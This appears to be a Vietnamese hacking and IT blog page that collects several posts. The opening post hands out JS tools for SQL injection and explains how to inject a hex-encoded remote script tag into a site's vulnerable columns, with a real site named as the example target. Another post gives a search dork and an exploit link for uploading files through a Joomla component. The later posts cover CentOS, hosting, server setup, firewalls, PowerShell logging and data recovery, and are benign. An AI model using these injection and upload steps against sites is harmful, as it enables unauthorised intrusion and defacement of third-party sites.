Auto Khai Thác SQL Injection (Update)

I- JS Khai thác sqli





Download Code:

Quote:

http://www.mediafire.com/?457p1u9c9uv7cw7 pass: VNH

-úp file js lên hosting.
-sử link js trong sript sau:

Quote:

<script src='http://link.com/sqli.js'></script>

VD:

Quote:

<script src='http://thptquangha.com/sqli.js'></script>

-sau đó convert đoạn sript trên sang hex.
- ta được :

Quote:

3c736372697074207372633d27687474703a2f2f7468707471 75616e6768612e636f6d2f73716c692e6a73273e3c2f736372 6970743e

- dùng nó trong thẻ sau:


concat((0x mã hex))vnhack

VD:

Quote:

concat((0x3c736372697074207372633d27687474703a2f2f 746870747175616e6768612e636f6d2f73716c692e6a73273e 3c2f7363726970743e))vnhack

- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).

-VD với js trên :

Quote:

http://kemlam.com/?content=detail&pr...,9,10,11,12,13

=======================================


II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên




download:

Quote:

http://www.mediafire.com/?o9gvag0gl4ggc8d

Quote:

http://kemlam.com/?content=detail&pr...,9,10,11,12,13

Xem Thêm

Hướng dẫn cài đặt các gói rpm trên CD/DVD CentOS sử dụng yum

Những ai đã dùng CentOS chắc cũng đã biết lệnh yum; mặc định sau khi cài CentOS xong (ở đây tui ví dụ bản CentOS 5.5 Final), việc sử dụng yum để cài đặt phần mềm bắc buộc phải có internet, tình trạng này có thể khó khăn cho những người không có internet. Cũng chính vì điều này cho nên các phần mềm và thư viện thông dụng cũng đã được tích hợp vào DVD CentOS, và làm thế nào để tiến hành cài đặt phần mềm từ DVD sử dụng yum? Ta chỉ cần thực hiện các bước đơn giản sau (đừng quên cho đĩa CentOS vào):

- Di chuyển tới thư mục yum.repos.d :

Mã:

cd /etc/yum.repos.d/

- Đổi tên file CentOS-Base.repo thành CentOS-Base.repo.bak (phòng xa):

Mã:

mv CentOS-Base.repo CentOS-Base.repo.bak

- Dùng trình soạn thảo để thay đổi nội dung file CentOS-Media.repo như sau:

Trích dẫn:[c5-media]
name = CentOS-$releaserver - Media
baseurl=file:///media/CentOS/
file://media/cdrom/
file:///media/cdrecorder/
file:///media/CentOS_5.5_Final/
gpgcheck=1
enabled=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-5

Việc tiếp theo, ta tiến hành cài đặt thử:

Mã:

yum install gcc* -y

Chúc thành công ...

Xem Thêm

Exploit Com_Redmystic

Dork: inurl:/index.php?option=com_redmystic
http://www.discount-espresso.co.uk/media/r.php

Quăng link vào và Exploit. Nếu thành công sẽ xuất hiện link upload

Xem Thêm

Share Site Hosting , Domain Free

Site thứ 1 : http://www.runfuse.com/domain-name-hosting-services/?gclid=COaii-fArrgCFSgB4god53EAUA ( domain )
+ Free : .com .net .org .eu .biz .us .de .cu.uk .... ( 1 year )
Site thứ 2 : http://vn.cydots.com/ ( domain )
+ Free : net.ms, info.ms, us.ms, shop.ms, au.ms, de.ms, fr.ms, cn.ms, hk.ms, br.ms...
Site thứ 3 : http://vn.smartdots.com/ ( domain )
+ Free : ... ( các bạn tự tìm hiểu )
Site thứ 4 : http://ihost.com.vn/ ( hosting )
Site thứ 5 : http://www.vn.ee/ ( domain )
+Free : vn.ee , vn.ae m .doc.ac .....
Site thứ 6 : http://byethost.com/ ( hosting )
Site thứ 7 : http://www.biz.nf/ ( domain lẫn hosting )

Xem Thêm

Hướng dẫn xây dựng Server chỉ với 1 cú click

Đối với những bạn dùng Managed VPS/Server thì nó đã bao gồm một chương trình quản lý đồ sộ nào đó với tất cả những chức năng bạn cần và đôi khi có cả những chức năng bạn không khi nào dùng tới. Nó có thể là Cpanel, Plesk hay DirectAdmin, có WebUI cực kỳ dễ dàng trong việc quản lý hệ thống.

Nhưng cũng chính vì thế, cho nên VPS/Server của bạn vô tình bị hệ thống quản lý đồ sộ này chiếm mất một cơ số tài nguyên vốn hạn chế như ổ đĩa, ram, cpu... Và vì nó cài đặt nhiều chương trình của bên thứ 3 vào VPS/Server của bạn nên cũng làm tăng mức độ rủi ro về bảo mật lên ?. Hơn thế nữa, bạn sẽ phải phụ thuộc vào hệ thống quản lý đó mà không thể tùy biến theo ý thích cá nhân nhiều. Một ví dụ đơn giản như bạn thấy Apache quá cồng kệnh, quá tốn tài nguyên, quá chậm... và bạn muốn chuyển sang NGINX, nhanh, nhẹ, mạnh mẽ, tiết kiệm ? Chưa kể đến những control panel nêu trên đều thu phí, và giá cả thì không hề rẻ chút nào...


Chính vì những nguyên nhân trên, một số bạn sẽ thích dùng Unmanaged VPS/Server hơn, tạm dịch là hàng tự mình quản lý, nó không cài sẵn bất cứ control panel nào, gần như 100% nguồn lực của VPS/Server đang đợi bạn sử dụng, và giá cả cũng rất phải chăng. Nhưng khó khăn khi dùng VPS/Server khi mà bạn không biết gì nhiều về linux là rất lớn, đó cũng chính là lý do khiến nhiều bạn chịu thua. Chính vì vậy, hôm nay mình giới thiệu đến các bạn 1 script đơn giản, không những giúp các bạn cài đặt, cấu hình VPS/Server chỉ cần 1 cái click và vài lần nhập liệu, mà còn hơn thế nữa, nó sẽ giúp các bạn quản lý VPS/Server Unmanaged đơn giản hơn bao giờ hết





Script này sẽ tự động thực hiện những công việc sau:

1. Cài đặt NGINX phiên bản stable mới nhất
2. Cài đặt MariaDB phiên bản stable mới nhất
3. Cài đặt PHP-FPM phiên bản 5.4 bản mới nhất
4. APC opcode cache cho PHP bản mới nhất
5. Xóa bỏ Sendmail và cài EXIM thay thế ( dịch vụ gửi, nhận email )
6. Xóa bỏ rsyslog và cài Syslog-ng thay thế
7. Xóa bỏ những dịch vụ không cần thiết ra khỏi danh sách khởi động, sau khi khởi động lại, những dịch vụ này sẽ không còn chạy nữa, để lại không gian cho những dịch vụ chính có thể thoải mái bơi lội ( đương nhiên chỉ xóa những dịch vụ không thực sự cần thiết, những dịch vụ không cần cho web server mà vẫn cần cho hệ điều hành hoạt động thì vẫn giữ lại  )
8. Không dùng bất cứ phần mềm quản lý nào như cpanel, directadmin, webmin để tiết kiệm tài nguyên và đảm bảo tính bảo mật cho hệ thống
9. Sử dụng PhpMyAdmin (PMA) làm chương trình quản lý cơ sở dữ liệu, đơn giản, quen thuộc, chạy như một mã nguồn thông thường nên nó rất gọn nhẹ và chỉ chiếm 1 chút tài nguyên khi chúng ta sử dụng, lúc ko sử dụng thì nó không hề tiêu tốn tài nguyên. Nó chạy trên một port bí mật tăng mức độ an toàn lên cao hơn
10. Tích hợp module Cloudflare sẵn trong nginx, các bạn có thể yên tâm dùng cloudflare. Đối với những bạn không dùng cloudflare thì module này cũng ko hề gây trở ngại gì hết, các bạn không cần lo lắng
11. Tự động thu thập thông tin của VPS như Ram, Disk, CPU, Load average để từ đó đưa ra cài đặt hợp lý
12. Có đầy đủ những tính năng cần thiết để quản trị server như thêm, xóa website, backup dữ liệu, tự động backup dữ liệu, cài ioncube loader, thêm xóa database...
13. Tích hợp script chống ddos nhỏ gọn và mạnh mẽ, có thể cấu hình trong menu chọn của servertut script. Chống ddos này dựa vào iptables có sẵn trong linux mà không hề cài thêm, vẫn luôn đúng với tiêu chí của servertut script : Tận dụng những thứ sẵn có của linux
14. Bổ sung tính năng đồng bộ tuyệt vời giữa VPS và máy tính cá nhân, quản lý tập tin và thư mục chưa bao giờ dễ dàng như thế, sao lưu chưa bao giờ dễ dàng như thế ! ( Các bạn nên đọc bài này để biết thêm )

Cách cài đặt server sử dụng script này:
Cực kỳ đơn giản, bạn chỉ việc đăng nhập vào VPS /Server thông qua SSH, sau đó chạy duy nhất 1 lệnh sau

Code:

wget http://servertut.com/downloads/scripts/wp-build && chmod +x wp-build && ./wp-build

Newbie: Nếu các bạn chưa biết làm thế nào để đăng nhập vào VPS/Server để chạy lện trên, hãy đọc bài viết này



Script yêu cầu hệ điều hành centos 6 64bit. Ngoài ra thì VPS bạn nên có ít nhất 512mb ram. Do nếu ram thấp quá có thể không đủ chỗ cho nhiều dịch vụ như vậy cùng chơi. Nếu bạn nào có vps ram thấp hơn 512mb mà quan tâm, mình sẽ viết script tối ưu cho loại vps ram ít đó 

Việc chạy script đơn giản đến mức không thể đơn giản hơn. Nó vốn là 3 lệnh, nhưng mình đã dùng ký tự && nối lại. Do đó bạn chỉ việc coppy và paste lệnh đó vào putty.... và ấn [ENTER]

Script làm việc một cách khoa học, nó muốn cài đặt các dịch vụ lên server thì trước tiên nó sẽ thu thập các thông số của server. Như ở ví dụ trên mình dùng VPS 16GB Ram của chính mình ra thử. Bạn hãy đối chiếu với thông số của nhà cung cấp đưa ra khi bán vps cho bạn xem có đúng không nhé

Tiếp đó, script sẽ hỏi bạn những thông tin cơ bản yêu cầu người dùng nhập liệu như sau :

• Tên miền chính: Nếu bạn chỉ định chạy 1site thì không cần quan tâm, còn nếu bạn sẽ chạy nhiều website trên VPS/Server thì đây sẽ là website chính, không thể xóa bỏ, chứa bộ nguồn PMA và chứa các file backup của tất cả các website trên server
• Port PMA các bạn có thể đặt tùy ý, nhưng không được trùng với port đã được các dịch vụ/chương trình khác sử dụng, và phải là 1 port thực. Bạn nên vào đây để tìm hiểu thêm nếu không chắc chắn
• Port cho btsync dùng để truy cập trang quản trị nền web của chương trình. Cũng tương tự như port dành cho PMA, port cho btsync cũng phải là port thực và duy nhất, không trùng với port của các chương trình có trong hệ thống, kể cả port PMA!
• Email : Đây sẽ là địa chỉ email chương trình dùng để liên hệ với bạn, rất nhiều thông tin quan trọng sẽ gửi tới đây, Email này cũng chính là tên đăng nhập vào các trang quản lý APC Statics và BTSync WebUI. Bạn hãy cân nhắc nên dùng email nào, và nhớ nhập chính xác
• Mã bảo mật cá nhân : Các bạn tự đặt, không được chứa bất kỳ ký tự đặc biệt nào, kể cả dấu cách. Mã này dùng để tăng tính an toàn cho file backup, và cũng chính là mật khẩu để truy cập vào các trang quản lý APC Statics và BTSync WebUI

Sau khi nhập xong, các bạn cứ để Script tự thực hiện công việc của mình. Hãy tự thưởng cho mình 1 ly cà phê, thời gian cài đặt nhanh hay chậm phụ thuộc vào tốc độ mạng của VPS/Server. Nếu các bạn thấy trên màn hình báo faile hay nhảy lên chữ màu xanh màu đỏ, đừng hoảng, đó là điều bình thường !

Tới bước cấu hình cơ bản cho MariaDB là đã sắp xong rồi đấy, các bạn ấn phím enter nếu được yêu cầu. Khi yêu cầu nhập mật khẩu cho root MariaDB thì các bạn cứ nhập rồi enter tiếp khi script muốn được cấp quyền để thực hiện bảo mật MariaDB

Lưu Ý : Root ở đây là tên người dùng trong cơ sở dữ liệu mysql, nó khác hoàn toàn root của VPS

Như vậy là mọi việc đã hoàn thành, sau khi hoàn thành công việc của mình, script sẽ tự khởi động lại VPS. Các bạn hãy check mail để nhận những thông tin cơ bản nhất

Lưu Ý : Mọi email mà Servertut Script gửi cho bạn mặc định sẽ bị tống vào mục Spam. Đây là điều bình thường và hiển nhiên, do đây là email gửi bằng người dùng root của hệ thống linux, nó cực kỳ nguyên thủy. Như của mình thì địa chỉ gửi email là root@sv9 . Các bạn đừng lo lắng, nếu ứng dụng của các bạn cần gửi mail thì nó sẽ được thiết lập khác, có địa chỉ gửi rõ ràng, có thông tin phụ rõ ràng để các bộ lọc spam mail có thể phân biệt

Nội dung email

Như vậy là xong rồi, Nếu các bạn chưa tin thì hãy ước lượng thời gian VPS/Server khởi động lại xong rồi click vào các link trong email xem. Như VPS mình dùng ổ đĩa SSD, khởi động chưa tới 6 giây, nhận đc email là có thể bắt đầu click các link xem thế nào rồi

Link website : Do chúng ta chưa upload code lên nên nginx nó báo 403

Link PMA

Đăng nhập thử vào bằng tên đăng nhập là root, và password là mật khẩu các bạn đặt lúc nãy

Link xem thông tin về APC Opcode Cache



Đăng nhập vào xem thông tin đầu đủ hơn và có thể xóa cache bằng cách click vào nút login bên góc phải phía trên. Tên đăng nhập là email bạn nhập lúc nãy, mật khẩu chính là mã bảo mật cá nhân

Tiếp theo là trang quản lý btsync, đăng nhập với thông tin như trên APC

Nếu các bạn nhập chính xác, giao diện web của chương trình sẽ như sau :

btsync là một chương trình cực mạnh và nhẹ, mình đánh giá rất cao, và có một bài viết riêng về cách dùng chương trình này phục vụ công việc quản trị VPS/Server của các bạn. Các bạn có thể đọc tại đây

Dạo xong các WebUI rồi, thì các bạn đừng quên đăng nhập lại vào giao diện dòng lệnh của VPS/Server. Script cung cấp rất nhiều công cụ quản trị hữu ích. Các bạn chỉ cần gõ lệnh

Code:

servertut-menu

Và một loạt chức năng sẽ hiện ra cho phép các bạn chọn, cực kỳ đơn giản và dễ sử dụng

Lưu ý rằng "nhập vào lựa chọn của bạn" là yêu cầu các bạn nhập số tương ứng với nội dung bạn muốn chọn. Ví dụ mình muốn thêm website, mình nhập vào 1 và enter

Hướng dẫn quản trị VPS/Server dùng Servertut Script

Các hướng dẫn dùng chung cho các VPS/Server

1. Hướng dẫn sử dụng dòng lệnh trong VPS/Server
2. Sử dụng các chương trình hỗ trợ SFTP để có giao diện đồ họa, quản lý file và thư mục dễ dàng hơn
3. Ứng dụng BTSync để quản lý file và thư mục trong VPS/Server
4. Hướng dẫn quản lý cơ sở dữ liệu mysql với PhpMyAdmin

Các hướng dẫn dùng riêng cho VPS/Server với lệnh servertut-menu

1. Thêm/Xóa website
2. Sao lưu data/code
3. Bật/Tắt tự động sao lưu (data)
4. Tạo/Xóa database
5. Bật/Tắt Downtime Static/APC Opcode Cache/PMA/BTSync
6. Cài đặt/Gỡ bỏ Ioncube Loader
7. Chống (D)Dos, Flood
8. Nâng cấp phiên bản script và phiên bản các phần mềm, chương trình
9. Chú Ý : Script không phải là một dịch vụ, không phải là một chương trình cụ thể, mà nó tận dụng những cái có sẵn của Linux, cho nên nó không hề chiếm bất cứ Ram hay CPU. Có chăng nó chỉ chiếm chút Disk ( Khoảng 600kb ). Do đó khi dùng Script của Servertut thì mọi nguồn lực bạn có đều dùng để tập trung cho việc vận hành các dịch vụ chính như webserver, mariadb, php...
   
   
   
   
   
   Một số thay đổi :
   • 0.0 => Phiên bản đầu tiên
   • 0.1 => Tối ưu hơn trong sưu tập và phân tích nguồn lực vps
   • 0.2 => Bổ sung syslog-ng vào danh sách dịch vụ, do syslog-ng gọn nhẹ hơn so với rsyslog và hoàn toàn có thể thay thế cho rsyslog. Như vậy Script sẽ cài đặt tất cả 5 dịch vụ : MariaDB, Ngix, php-fpm, Exim, Syslog-ng
   • 0.3 => Thêm tính năng tự động sao lưu vào script, thêm tính năng gửi thông tin qua email thay vì hiển thị trên màn hình, giúp các bạn dễ lưu giữ hơn
   • 0.4 => Thêm menu chọn với đầy đủ tính năng, bỏ script tự động sao lưu cũ, viết mới script có thể chọn nhiều database được tự động, có thể đặt giờ, ngày cho việc sao lưu tự động một cách đơn giản. Thêm tính năng kiểm tra và cập nhật phiên bản Servertut Script
   • 0.4.1 => Thêm tính năng cài đặt hoặc gỡ bỏ Ioncube Loader, tối ưu lại toàn bộ các addons, ví dụ như khi tạo data thì sẽ có thêm tùy chọn tạo user dùng riêng với data đó
   • 0.4.1.1 => Thêm tính năng bảo mật phpmyadmin, chỉ bật lên khi cần dùng, khi không dùng thì tắt đi ( Thank ý tưởng của http://thachpham.com )
   • 0.4.1.1 => Thêm tùy chọn tắt hoặc bật APC Opcode Cache, tránh một số bạn dùng server để code mà lại bị cache làm phiền. Đối với những bạn dùng server để chạy website thì mình khuyên bật APC ( Thank ý tưởng củahttp://thachpham.com )
   • 0.4.1.1 => Thêm chức năng xem thống kê của APC Opcode Cache trên nền web, địa chỉ xem thống kê này vui lòng đọc email chào mừng lúc server mới xây dựng xong
   • 0.4.1.1 => Thêm tính năng thống kê số lần server mất kết nối
   • 0.4.1.2 => Fix APC Opcode ( Thank report từ http://animeviet.net )
   • 0.4.1.2 => Thêm tính năng chống DDOS. Có tùy chọn bật và tắt firewall. Khi tắt firewall thì có tùy chọn kiểm tra xem mình có đang bị ddos hay không, và nếu có thì liệt kê danh sách những ip đang có lượng connect nhiều hơn giới hạn thiết lập trong firewall. Có tùy chọn để block những ip này bằng tay. Còn khi bật firewall thì nó hoàn toàn tự động.
   • 0.4.1.3 => Thêm tính năng đồng bộ giữa VPS và máy tính cá nhân ( Đọc thêm ở đây để biết chi tiết )
   • 0.4.1.3 => Update phpmyadmin lên phiên bản 3.5.8.1 mới nhất
   • 0.4.2 => Do lúc bất cẩn mình làm mất sạch dữ liệu của script, do đó mình đã phải ngồi viết lại, cho nên cấu trúc bản này khác hẳn những bản trước, mọi chức năng hầu như không thay đổi, nhưng những bản trước ko thể nâng cấp lên bản này và không thể tiếp tục nâng cấp lên các bản sau. Tức là nâng cấp chỉ áp dụng cho 0.4.2 trở lên
   • 0.4.2.1 => Thêm chức năng thêm tên miền ( hoặc tên miền con ) chạy song song với ( hoặc chuyển hướng truy cập tới ) một website có sẵn trong hệ thống, cám ơn 2 bạn @ntycle và @Tràng Lông Rân đã cho mình ý tưởng này
   
   
   
   Để sử dụng hết được tính năng của Script, chỉ cần đánh lệnh
   Code:

   servertut-menu

   Nó sẽ có danh sách toàn bộ chức năng của Script, có chỉ dẫn bằng tiếng việt không dấu cho các bạn, cực kỳ dễ dàng tao tác 

Theo : http://servertut.com

Xem Thêm

Tạo tường lửa miễn phí

Tường lửa là một thiết bị phần cứng hoặc một phần mềm hoạt động trong môi trường máy tính nối mạng để ngăn chặn một số liên lạc bị cấm bởi chính sách an ninh của cá nhân hay tổ chức. Tường lửa trên hệ thống là một phần không thể thiếu với vai trò ngăn chặn việc nhiễm virus khi bạn lướt web cũng như phòng chống tin tặc đột nhập.
ZoneAlarm Firewall

ZoneAlarm là một trong những tường lửa cá nhân hiệu quả và dễ sử dụng nhất hiện nay. Đây là một công cụ giúp những người làm việc trong môi trường văn phòng tránh được nhiều hiểm hoạ, với giao diện đơn giản ngay cả đối với người dùng nhiệp dư nhất.



ZoneAlarm sẽ bảo vệ máy tính khỏi các Rootkit (thường được dùng để che giấu sự có mặt của các phần mềm nguy hiểm như trojans hay keylogger) và các kiểu xâm nhập máy tính một cách âm thầm khác. Máy tính sẽ được thiết lập lá chắn ngay trong quá trình khởi động bằng cơ chế Early Boot Protection.

Bên cạnh đó, khả năng kiểm soát chương trình (Program Control) giúp hạn chế tối đa hoạt động của các phần mềm nguy hiểm trên máy tính. Tính năng Firewall Hệ Điều Hành (OSFirewall™) giúp ngăn chặn những spyware khó diệt và những đe dọa bên sâu khỏi xâm nhập vào PC của bạn.
Privatefirewall

Privatefirewall là một ứng dụng tường lửa cá nhân và phát hiện xâm nhập bảo vệ máy tính của bạn từ các hacker và Trojan horse. Privatefirewall quản lý và cho phép kết nối mà nó biết được là tin cậy hoặc được ủy quyền, và ngăn ngừa bất cứ kết nối trái phép nào.



Chương trình này cung cấp ba cấp độ bảo mật cài sẵn chỉ định bởi màu sắc, vậy để sử dụng chương trình bạn không cần phải là một chuyên gia an ninh mạng – các màu xanh, vàng, và màu đỏ chỉ ra mức độ bảo mật của chương trình, màu đỏ là cao nhất.

Mặt khác, người dùng có kinh nghiệm có thể tự cấu hình cấp độ bảo mật hiện tại của chương trình, bao gồm chặn các JavaScripts, ActiveX, cookie,… Điều phân biệt Privatefirewall với các chương trình tương tự khác là tính năng SecurePOP, tính năng này làm việc với Outlook và Outlook Express, và các chế độ tàng hình cho phép bạn giấu địa chỉ IP máy tính vì thế làm cho máy tính của bạn “vô hình”.
SmoothWall Express

SmoothWall Express là một trong số những phần mềm mã mở nhận được sự đánh giá rất cao của cộng đồng người dùng chuyên nghiệp, giải pháp hữu hiệu và không tốn chi phí khi xây dựng tường lửa cho hệ thống mạng.



Một số sản phẩm mã nguồn mở, chất lượng tốt vẫn có thể mang đến niềm tin cho người dùng. Ngoài chi phí rẻ (thậm chí miễn phí), các ứng dụng mã mở thường nhận được sự hỗ trợ đáng kể từ phía cộng đồng. Hiện phần mềm tường lửa (firewall) SmoothWall Express (SWE) đã có phiên bản 3.0, được phát hành theo giấy phép GNU. Người dùng có thể tải về miễn phí.
TinyWall

Có nhiều cách để bạn có thể cấu hình cho Windows Firewall trong đó việc sử dụng công cụ của bên thứ ba là rất phổ biến và TinyWall là phần mềm như vậy. Đây là một giải pháp đơn giản, dễ dàng mà không làm ảnh hưởng đến hiệu suất hệ thống.



Không có trình điều khiển bổ sung hoặc các thành phần kernal được cài đặt cùng, TinyWall sẽ cung cấp cho Windows Firewall một cấu hình an toàn với giao diện làm việc đơn giản, bạn có thể dễ dàng thiết lập những phần mềm, ứng dụng có thể truy cập mạng và ngoài danh sách an toàn đó ra tất cả sẽ bị chặn lại.

Phần mềm cũng sẽ cho phép bạn ngăn chặn các chương trình khác từ modifing hoặc ghi đè lên các thiết lập tường lửa của bạn. Nếu bạn đang tìm kiếm một giải pháp tường lửa cơ bản và đơn giản thì TinyWall có thể sẽ là sự lựa chọn phù hợp cho bạn

Xem Thêm

sử dụng powershell để tạo eventlog

Trong bài viết dưới đây, chúng tôi sẽ giới thiệu và hướng dẫn các bạn cách sử dụngPowerShell để tạo các bản ghi log trên hệ thống, cụ thể ở đây là lệnh cmdlet Write-EventLog. Cú pháp cơ bản của lệnh này có dạng:

Trích dẫn:PS C:\> help Write-EventLog

Lưu ý rằng khi sử dụng cmdlet này, các bạn phải khai báo tên file log, source, event id và message tương ứng. Rất giống với công cụ command EVENTCREATE.EXE, nhưng người dùng lại không thể sử dụng các nguồn không theo chuẩn hoặc tương tự như vậy. Mà thay vào đó họ phải khởi tạo những thông số kỹ thuật hoặc nguồn dữ liệu trước tiên. Và 1 trong những cách đơn giản nhất để tìm nguồn dữ liệu là dùng Windows Management Instrumentation (WMI).

Trích dẫn:PS C:\> $log=Get-WmiObject win32_nteventlogfile -filter "filename='system'"
PS C:\> $log.Sources
System
ACPI
adp94xx
adpahci
adpu320
...

Nếu 1 trong những nguồn trên có vẻ phù hợp thì các bạn hãy ghi lại thành bản ghi như sau: 

Trích dẫn:PS C:\> write-eventlog System -source Server -eventid 12345 -message "I am a custom event log message"

Dạng entry mặc định là Information, người dùng có thể tạo riêng eventID và thay đổi, chỉnh sửa bất kỳ lúc nào:

Trích dẫn:PS C:\> get-eventlog system -newest 1 | format-list EventID,EntryType,Source,Message
EventID : 12345
EntryType : Information
Source : Server
Message : The description for Event ID '12345' in Source 'Server' cannot be
found. The local computer may not have the necessary registry
information or message DLL files to display the message, or you
may not have permission to access them. The following inform
ation is part of the event:'I am a custom event log message'

Giả sử rằng nếu muốn tìm kiếm event ID hoặc message bất kỳ nào đó, chắc hẳn sẽ nhận được lỗi nho nhỏ như dưới đây: 

Trích dẫn:PS C:\> get-eventlog system -newest 1 -message "*custom event*"
Index Time EntryType Source InstanceID Message
----- ---- --------- ------ ---------- -------
1512222 Jan 25 10:05 Information Server 12345 The des...

Không thực sự hoàn hảo, nhưng vẫn hoạt động đúng chức năng. Trong khi nếu xét về mặt lý thuyết thì chúng ta có thể đăng ký bằng các nguồn dữ liệu mới, và cũng có thể tạo được bản ghi mới bằng cách dùng cmdlet lệnhNew-Eventlog. Thông thường thì lệnh cmdlet này được áp dụng để những nhà phát triển, lập trình xây dựng 1 mô hình event log cố định. Ví dụ dưới đây, chúng ta sẽ tạo 1 bản ghi log theo dạng custom, đồng thời khởi tạo 1 số nguồn dữ liệu khác nhau.

Trích dẫn:PS C:\> new-eventlog -LogName PSLogging -Source ADSI,WMI,Test,Other

Kiểm tra lại những gì đã được tạo: 

Trích dẫn:PS C:\> $log=Get-WmiObject win32_NTEventlogfile -filter "filename='PSLogging'"
PS C:\> $log | fl
FileSize : 69632
LogfileName : PSLogging
Name : C:\Windows\System32\Winevt\Logs\PSLogging.evtx
NumberOfRecords : 0

Đó là 1 file log hoàn toàn mới, tiếp theo là việc kiểm tra nguồn dữ liệu – source: 

Trích dẫn:PS C:\> $log.sources
PSLogging
ADSI
Other
Test
WMI

Và cuối cùng, nhập ít dữ liệu bất kỳ vào đây:

Trích dẫn:PS C:\> Write-EventLog PSLogging -Source Test -eventID 1000 -Message "I am the first entry"

Bên cạnh đó, chúng ta có thể sử dụng bất kỳ event ID nào, hoặc tự khởi tạo chúng theo ý muốn: 

Trích dẫn:PS C:\> get-eventlog PSLogging | format-list
Index : 14
EntryType : Information
InstanceId : 1000
Message : I am the first entry
Category : (1)
CategoryNumber : 1
ReplacementStrings : {I am the first entry}
Source : Test
TimeGenerated : 1/25/2012 10:45:47 AM
TimeWritten : 1/25/2012 10:45:47 AM
UserName :

Tại bước này, Windows sẽ không “quan tâm” tới event ID nữa. Nếu muốn gán thêm bất kỳ nguồn dữ liệu nào khác, các bạn chỉ cần sử dụng lại lệnh cmdlet New-Eventlog:

Trích dẫn:PS C:\> New-EventLog PSLogging -source Scripting

Và nguồn mới của chúng ta tại đây: 

Trích dẫn:PS C:\> Get-WmiObject win32_NTEventlogfile -filter "filename='PSLogging'" | Select -expand Sources
PSLogging
ADSI
Other
Scripting
Test
WMI

Lệnh cmdlet New-Eventlog có tham số –computername đi kèm, do vậy sẽ dễ dàng hơn rất nhiều để khởi tạo 1 eventlog mới bất kỳ trên toàn bộ Desktop hoặc server – nơi chúng ta muốn giám sát, quản lý log. Chúc các bạn thành công!

Xem Thêm

Phục hồi dữ liệu xóa nhầm với iCare Format Recovery Pro

Trong quá trình sử dụng máy, không ít lần bạn sẽ vô tình format phân vùng ổ đĩa, hay thường gặp hơn là USB, thẻ nhớ hay ổ cứng di động, khiến toàn bộ dữ liệu, hình ảnh trên đó biến mất theo. Đối với những dữ liệu như thế này mất đi là một điều đáng tiếc nhưng để bỏ ra khoảng tiền lớn để nhờ đến các dịch vụ phục hồi dữ liệu bên ngoài thì có vẻ hơi phí. iCare Format Recovery sẽ là “vị cứu tinh” trong trường hợp này

iCare Format Recovery có thể phục hồi dữ liệu trên phân vùng định dạng hay ghost nhầm, ỗ đĩa (USB, thẻ nhớ,…). Thậm chí, Phần mềm còn cho phép khôi phục dữ liệu trong trường hợp phân vùng ổ đĩa bị lỗi nào đó (có thể do virus phá hại), khiến người dùng phải format lại phân vùng ổ đĩa để sử dụng bình thường.

Bạn có thể tải về iCare Format Recovery tại đây

Sau khi tải về và cài đặt bình thường như các ứng dụng phổ thông khác. Từ giao diện chính sẽ liệt kê đầy đủ các phân vùng ổ đĩa đang có trên hệ thống. Tại đây, bạn chọn phân vùng mà mình đã vô tình format để khôi phục lại dữ liệu có trên đó, sau đó nhấn nút Recorver.

Phần mềm sẽ thực hiện quá trình quét và tìm kiếm những dữ liệu có thể khôi phục được từ phân vùng này. Thời gian diễn ra quá trình nhanh hay chậm phụ thuộc vào lượng dữ liệu có thể khôi phục cũng như dung lượng của phân vùng. Sau khi quá trình quét kết thúc, phần mềm sẽ liệt kê những định file hệ thống mà trước khi phân vùng bị format. Dựa vào thông số “Suggestion” (Đề xuất), bạn nên chọn phân vùng nào có thông số Suggestion cao nhất để có khả năng khôi phục được file lớn nhất.

Đánh dấu chọn 1 trong các phân vùng được liệt kê, sau đó nhấn nút Show Files. Danh sách những file có thể khôi phục được sẽ liệt kê dưới dạng các nhóm theo từng thư mục (file media, file ảnh, file nén…). Bạn có thể kích đôi vào từng file ở khung bên phải để xem nội dung trước khi quyết định có khôi phục file đó hay không. Sau khi đã tìm đúng file cần khôi phục, bạn đánh dấu vào file đó (có thể đánh dấu đồng thời nhiều file hoặc đánh dấu chọn toàn bộ), sau đó nhấn nút Save files.

Hộp thoại hiện ra cho phép bạn chọn thư mục để lưu lại những file cần khôi phục. Quá trình khôi phục diễn ra nhanh hay chậm phụ thuộc vào dung lượng và số lượng file cần khôi phục. Sau khi quá trình hoàn tất, một thư mục hiện ra trong thư mục bạn đã chọn để lưu file, bên trong có chứa những file đã chọn để khôi phục. Bây giờ, bạn đã lại có thể sử dụng những dữ liệu đã bị mất này.

Xem Thêm

Bảo vệ mã hóa tài khoản và mật khấu khi sử dụng Google Chrome

uá trình sử dụng trình duyệt Google Chrome hết sức tiện lợi, nhanh và có thể chỉ đến mọi đường link nếu bạn đang muốn tìm nó cũng như khi bạn tham gia các mạng xã hội. Việc đăng nhập và tạo các tài khoản là việc mà chúng ta phải làm khi muốn phát ngôn hay đóng góp ý kiến ở đó....

Nhưng có khi nào bạn mã hóa tất cả các thẻ duyệt, đồng bộ tài khoản và tự động đăng nhập chưa? Tất cả các nội dung đó, cách làm sau đây sẽ giúp phần nào đó cho bạn.....

Hoặc ...

Xem Thêm